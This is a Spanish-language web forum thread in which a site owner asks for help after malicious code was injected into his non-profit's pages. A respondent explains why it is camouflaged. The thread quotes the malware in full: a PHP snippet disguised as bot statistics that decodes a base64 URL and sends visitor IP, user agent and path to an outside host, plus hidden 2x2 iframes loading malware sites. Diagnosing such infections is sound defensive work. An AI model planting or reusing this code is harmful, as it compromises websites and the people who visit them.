problemas con ataque de virus

HalconVigia · #1 (**permalink**) 20/02/2013, 02:32

Buenas...

Resulta que tengo hecho un sistema de control de una asociacion civil sin fines de lucro para el control de sus miembros y todo funciona de maravilla pero de unos dias para aqui se han recibido ataques de insercion de codigo malisioso en las paginas de tipo html y en algunas php que tienen codigo fijo.

el sitio esta dividido en dos partes el portal principal que no tiene codigo php ejecutable, mas que la deteccion del tipo de navegador ya sea para pc normal o si es un telefono movil,
y la segunda que esta en un subdominio que es en donde funciona el sistema de control con bases de datos y control de usuarios, etc.
eh revisado las bases de datos y aparentemente estan limpias de codigo intruso
y los archivos php que tienen sessiones y condiciones asi como verificacion de codigo parecen estar limpios, no obstante las paginas .html del mismo subdominio si estan afectadas...

el codigo que descubri en el index es este:

Código PHP:

 
  <?php

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

    // This code use for global bot statistic

    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

    $stCurlHandle = NULL;

    $stCurlLink = "";

    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes

    {

        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics

        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

            @$stCurlHandle = curl_init( $stCurlLink );

    }

    }

if ( $stCurlHandle !== NULL )

{

    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);

    $sResult = @curl_exec($stCurlHandle);

    if ($sResult[0]=="O")

     {$sResult[0]=" ";

      echo $sResult; // Statistic code end

      }

    curl_close($stCurlHandle);

}

}

?>

ahora los codigos que se insertan en las paginas es este:

Código PHP:

  document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzaf.html></iframe>');

 
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awad.html?i=698271></iframe>

Alguien que me ayude a darle explicacion porque no entiendo como es posible que puedan insertar si no tengo formularios hacia publico
y donde los tengo los filtro asi:

Código PHP:

  $usNick=strtoupper(trim(strip_tags(stripslashes(htmlentities($_POST[usNick])))));

$usCon=trim(strip_tags(stripslashes(htmlentities($_POST[usCon]))));

mas validacion que sea exactos y que existan... y recalco la base de datos estan limpias de codigo... que puede ser??

¿puede ser el hosting el que esta infectado de virus?
por cierto que es un hosting de pago, NO es gratuito...

de antemano muchas gracias por su ayuda....

Saludos!!

dashtrash · #2 (**permalink**) 20/02/2013, 04:55

La inyección de SQL no tiene nada que ver con los formularios.Tiene que ver con el uso de cualquier variable recibida desde el cliente, sea POST, GET, cookie o lo que sea.
La seguridad consiste en entender esto, no en hacer mil validaciones (qué sentido tiene hacer strip_tags después de htmlentities??) .
Ese trozo de código es obvio que no lo ha metido tu hosting.Está camuflado para que parezca un asunto de estadísticas, incluso el nombre del host al que se envia la información es mbrowserstats.com..Pero el código incluido , dos iframes a nosequé sitios, es muy sospechoso...
Estaría bien que capturaras qué es lo que se carga en esos 2 iframes.

HalconVigia · #3 (**permalink**) 20/02/2013, 08:37

Buenas!

Realmente como dije anteriormente no tengo formularios en la pagina principal ni en ningun otro lado que no sea en el subdominio que controla el sistema, NO utilizo cokies, es por eso que me salta a no entender bien como es posible que hayan incluido ese codigo y es obvio que estan atacando desde fuera porque casi a diario esta atacando.. ya limpie hasta la raiz, tenia un default.php que estaba ofuscado, obvio que ya lo borre..
por parte de la limpieza de las variables, en todos los casos utilizo la misma cadena para las variables...
me dices que no tiene caso... pues aqui en el mismo foro en su momento me hicieron la recomendacion de aplicarla asi.
no soy experto de php de hecho me puedo considerar aprendiz, y es por eso que pido ayuda para saber en que estoy fallando y poder solucionarlo.
por lado de las paginas me las bloquea firefox y chrome, asi que no puedo hacer captura, me dice que son paginas reconocidas como difusoras de virus..

de nuevo Gracias!!

dashtrash · #4 (**permalink**) 20/02/2013, 09:03

Y como ya te he dicho, que te ataquen no tiene nada que ver con dónde tienes los formularios..Repito..te pueden atacar por POST, por GET, por cookies...

HalconVigia · #5 (**permalink**) 20/02/2013, 14:14

buenas!

ok, lo entiendo.. creo que no me explique correctamente

mi duda es
¿como evito eso, que tengo que programar para evitar que suceda?

de neuvo gracias y saludos!

dashtrash · #6 (**permalink**) 20/02/2013, 14:55

Busca en el foro.webankenobi tiene creado un thread lleno de buenas prácticas de seguridad.